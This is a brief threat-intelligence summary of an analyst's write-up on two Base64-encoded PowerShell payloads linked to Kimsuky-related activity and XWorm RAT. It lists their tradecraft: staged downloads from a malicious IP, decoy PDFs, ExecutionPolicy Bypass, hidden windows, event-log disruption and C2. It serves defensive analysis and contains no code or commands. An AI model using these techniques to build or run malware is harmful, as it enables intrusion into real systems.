The Medium analysis reviews two Base64-encoded PowerShell payloads attributed to Kimsuky-related activity and XWorm RAT. After decoding, the scripts show staged behavior: PowerShell and CMD execution, fileless or obfuscated script execution, download of archives and executables from a single malicious IP, decoy PDF display, and use of ExecutionPolicy Bypass for later-stage payloads. The write-up also notes process-window hiding through Win32 API calls, registry and system discovery, event logging disruption, and C2 communication for payload retrieval or attacker commands. Although the evidence is analyst-written and figure-dependent, the distinctive CTI value is the overlap between Kimsuky-labelled PowerShell staging and commodity RAT-style remote access behavior.